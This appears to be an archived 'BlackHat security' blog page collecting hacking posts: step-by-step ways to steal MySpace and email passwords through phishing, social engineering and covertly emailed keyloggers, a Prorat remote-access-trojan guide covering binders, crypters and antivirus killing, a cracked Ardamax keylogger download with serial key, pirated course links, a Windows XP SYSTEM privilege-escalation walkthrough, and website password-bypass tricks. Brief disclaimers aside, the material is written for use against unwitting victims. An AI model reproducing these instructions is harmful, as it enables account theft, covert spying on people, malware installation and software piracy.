BlackHat security: Hacking

Showing posts with label Hacking. Show all posts

How to hack myspace private profile/account passwords

The article below explains the most popular ways used to hack myspace account passwords. I came across many myspace password hacking ways- some working …some not. So, i thought of collecting all these working myspace methods/ways of hacking myspace account password in this myspace article.

I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.

So, lets start…

Hack Myspace Account password

1. Myspace Phishing:

I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher

2.Keylogging:

This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.

3. Social engineering:

This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

4. Hacker virus:

I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.

So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….

Open It

Crack Windows Password Instantly

7 comments

Have you ever tried to log into a Windows computer for a few minutes and you finally realize that you forgot the password?

There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows.

The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5.

Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks.

LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer.

The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.

I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way.

How it works:

Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute.

Eventually the correct password will be sent and then displayed to the screen.

Good intentions:

System administrators can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.

Bad intentions:

Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domain controller and steal hundreds of passwords within minutes.

Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty.

Download LC5 (v5.04):

English version (with installer) - 2.29 MB
English version (without installer, ZIP) - 1.86 MB
English version (without installer, RAR) - 1.66 MB

Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.

Open It

Certified Ethical Hacker Certification Training Videos

15 comments

Certified Ethical Hacker Certification from Specialized Solutions enables the system administrator with critical information to identify, counter and stop or defend hackers from penetrating the corporate network. With this certification, you will begin to understand how a hacker thinks and what tactics they use to penetrate corporate networks. This allows system administrators to deploy proactive countermeasures and stay ahead of information security developments and exploited vulnerabilities.The Certified Ethical Hacker Training Solution from Specialized Solutions explores the existence and the use of hacking tools and security systems across 21 topical domains. Within each domain, students are presented with several tools that a hacker can use, and which countermeasures are most effective against their use.
Posted Image

>> Ethics and Legal Issues
>>Footprinting Techniques
>>Scanning
>>Enumeration
>>System Hacking
>>Trojans and Backdoors
>>Sniffers
>>Denial of Service
>>Social Engineering
>>Session Hijacking
>>CEH Hacking Web Servers
>>Web Application Vulnerabilities
>>Web Based Password Cracking
>>SQL Injection
>>Hacking Wireless Networks
>>Virus and Worms
>>Hacking Novell
>>Hacking Linux
>>IDS, Firewalls and Honeypots
>>Buffer Overflows
>>Cryptography
>>Penetration Testing Methodologies

Course Details:
Module 00 - CEH Introduction
Module 01 - Introduction to Ethical Hacking
Module 02 - Footprinting
Module 03 - Scanning
Module 04 - Enumeration
Module 05 - System Hacking
Module 06 - Trojans and Backdoors
Module 07 - Sniffers
Module 08 - Denial of Service
Module 09 - Social Engineering
Module 10 - Session Hijacking
Module 11 - Hacking Web Servers
Module 12 - Web Application Vulnerabilities
Module 13 - Web-based Password Cracking Techniques
Module 14 - SQL Injection
Module 15 - Hacking Wireless Networks
Module 16 - Virus and Worms
Module 17 - Physical Security
Module 18 - Linux Hacking
Module 19 - Evading, IDS, Firewalls, and Honeypots
Module 20 - Buffer Overflows
Module 21 - Cryptography
Module 22 - Penetration Testing
Self Study Module 23 - Exploit Writing
Self Study Module 24 - Covert Hacking
Self Study Module 25 - Writing Virus Codes
Self Study Module 26 - Advanced Module of Reverse Engineering

Contains 9 CDs in iso format

http://rapidshare.com/files/235489673/c.e.h.c.part01.rar
http://rapidshare.com/files/235489641/c.e.h.c.part02.rar
http://rapidshare.com/files/235489603/c.e.h.c.part03.rar
http://rapidshare.com/files/235489596/c.e.h.c.part04.rar
http://rapidshare.com/files/235490034/c.e.h.c.part05.rar
http://rapidshare.com/files/235490054/c.e.h.c.part06.rar
http://rapidshare.com/files/235490018/c.e.h.c.part07.rar
http://rapidshare.com/files/235490041/c.e.h.c.part08.rar
http://rapidshare.com/files/235490289/c.e.h.c.part09.rar

Open It

How to Hack a MySpace Account

18 comments

MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.

The following are the only 2 foolproof methods to hack Myspace.

1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.

1. HOW TO HACK MYSPACE – The Easiest Way

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

http://www.sniperspy.com/

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What if the target user (victim) refuses to run the attached file?

Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/

2. HOW TO HACK MYSPACE – Other Ways

Phishing

Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.
Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

Open It

Software to Hack computer remotely : RAT (Remote Access Trojan)

1 comments

Hello friends. I am back with complete new hacking topic - hacking computer remotely. In this article on remote computer hacking, I will inform you about hacking software to hack computer remotely. This software is called "Prorat" is a RAT (Remote administration Tool) used to hack computer remotely.

RATs :

RATs also called as Remote Administration tools are popularly used softwares to control other computer remotely and considering hacking aspects, hack computer remotely. There are many RATs such as:
Prorat
Turkojan
Yuri RAT and many other.

Working of RATs:

To hack computer remotely using a RAT, you have to create a server and then send this server to victim whose you wanna hack computer remotely. Generally, this server is binded to any file say picture or song, so that whenever victim opens this file on his computer, our server is installed and this server opens port of victim computer and by using this opened port, you are able to hack computer remotely.

It is this RAT server that then sends all system information to PRORAT and we can then hack computer remotely using PRORAT.

Things you can do by hacking computer remotely:

Once you gain access to remote computer, you can hack computer remotely and perform any of following:

# Install a keylogger
# Monitor Chat windows
# Shutdown computer remotely
# Take control of system registry
# Hack locally stored passwords and licence keys
# Download additional malware and servers to gain stronger control
# Control and access all Control Panel options(including add or remover programs)
# Send various Error messages
# Access Printer services
# Erase all disk data by formatting drives
# Open FTP connection and start file transaction

Thus, you are able to hack computer remotely 100%. This software to hack computer remotely is hence very popular.

Disadvantage of remote hacking software RAT:

The main disadvantage of this software - RAT is that the server created to hack computer remotely is recognized by most antiviruses as hacktool and hence, antiviruses send alert messages when installing RAT server.
But, there are many softwares like Binders or Crypters to hide RAT server and prevent antiviruses from sending alerts. Even there are softwares like AVkiller which is used to turn antivirus inactive and then our server (used to hack computer remotely) can be installed on victim computer very easily.

This is all about RATs - softwares to hack computer remotely. In my next article, i will inform about server creation and installation on remote computer. If you have any problem with this article on how to hack computer remotely, please mention it in comments section.

Open It

Hack account password with Ardamax keylogger- a powerful spy software...

1 comments

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file.This log file then can be used to hack anyones email account password or any computer password. The log file can be viewed with the powerful Log Viewer. Ardamax keylogger is easy to use and install. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access or one can use this tool to hack someones hotmail, gmail, yahoo, msn or other email account password. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for Windows 98, ME, NT4, 2000, XP and 2003.

Keylogger Features:

* Remote Installer - creates a customized Ardamax Keylogger engine file. You can email this file to your target for remote monitoring.

* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 98/2000/XP/2003/Vista Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!

* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.

* Network delivery - sends recorded logs through via LAN.

* Clipboard logging - capture all text copied to the Windows Clipboard.

* Visual surveillance - periodically makes screenshots and stores the compressed images to log.

* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o MSN Messenger, Windows Live Messenger
o ICQ Pro, ICQ Lite
o Skype
o Windows Messenger
o Google Talk
o Yahoo Messenger
o Miranda
o QiP

* Security- allows you to protect program settings, Hidden Mode and Log file.

* Web Update - Ardamax Keylogger can check the availability of updates, download and install them automatically. Thus, the latest version of Ardamax Keylogger will always be installed on your computer.

* Application monitoring - keylogger will record the application that was in use that received the keystroke!

* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!

* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.

* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.

* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.

* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/XP/Vista support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

Download:
http://rapidshare.com/files/47779604/Setup.rar
[Note, This is the Setup.exe from their site...I just found a working Name/Key so you can have the full version]

Name: nGen 2oo6
Key: RTHUUGQVAWDFOQT

Open It

Hack Windows XP administrator account

2 comments

As a reference to my post Hacking "Admin" from "User" mode & more[XP], where i have explained how to hack any windows XP password from user account, this is small but very useful XP hacking tutorial which is emphasized on the method used to change/hack Windows XP administrator password if you don`t have access to admin Account(Student account).

Just follow the steps given below steps:

1. Start-->Run-->lusrmgr.msc and press Enter or OK.
2. Than there`s two folders: Users & Groups. You need Users, than in this folder right click on Administrator-->Set New Password !

So, you are now able to hack in any Windows XP administrator account even when it is password protected. Just follow the hack and you will be able to bypass/hack password, infact change administrator account password.

Open It

Hacking Password Protected Websites

2 comments

Warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a ‘games’ directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can’t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it’s hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Open It

Hacking Sylabus[Ethical]

0 comments

Well many one ask this as what to study as a curriculum for Ethical hacking..
hmm well i made dis generalized mannual fr u guys. may help a lot

• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2007 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
(SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shellcode in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses

Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
Impersonation
• Impersonation of other Users- Hijacking kernel
tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image
files
• Attacking email vectors (Lotus Notes and
Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic

Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
organization
• Inspect changes to whois record over last 3
years
• Windows 2003 Server & Vista DNS Cache
Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP

Open It

Haking "Admin" from "User" mode & more[XP]

1 comments

really that is possible !

u know why is it a “user” account because it lacks come service layer than that in “administrator” account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:

You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the “Windows” drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the “Program Files” directory is a startup app. The call to “Program Files”, will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.

Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in.

System user name on start menu

explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.

ADMINISTRATOR IN WELCOME SCREEN.

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the “Welcome Screen” does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the “Win2000 Logon Screen Tweak” ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it’s Value data. Close the registry editor and restart.

dont hack others buddy be ethical !!! ... lolz ;)

Open It

Changing your MAC/IP on Windows XP

1 comments

There are two ways two change your IP on Windows. The easy way, and the hard way. Ill discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property “Locally Administered Address” or “Network Address”. Click the radio button next to the text box, and type in your new MAC address. (note you do not use the “-” when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in “cmd”

When the terminal comes up issue the command.

ipconfig /all
———————————————————————————————————————————————–

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in “cmd”

Once the terminal comes up type in

“net config rdr”

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in “regedt32″

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the “NetCfgInstanceId” Key with the number you wrote down earlier. Once you find a match double click on the key “NetworkAddress” and change the value to your new MAC address. Hit ok and reboot your system.

There r several ways u can determine ur IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:ip.txt)
But sometimes the window shows show much information u need to scroll around to fine it.

VIEW STATUS

Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Manage
Local Users nd Groups
Users
Right click on the user u want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::

some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi “imagename eq svchost.exe”

Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verfier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
On use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv

Hope you Get this !!!

surely comment here m waiting for comments ....

Open It

IP Address Hacking

1 comments

In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

Well I guess its one of the most important must learn manual for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed .

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.

What is IP and how to get the IP of a remote system::

Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:

Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as “/8′’s” or just “8’s” as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as “16’s”.

A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

“24’s” and is commonly used by most ISP’s.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************

For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

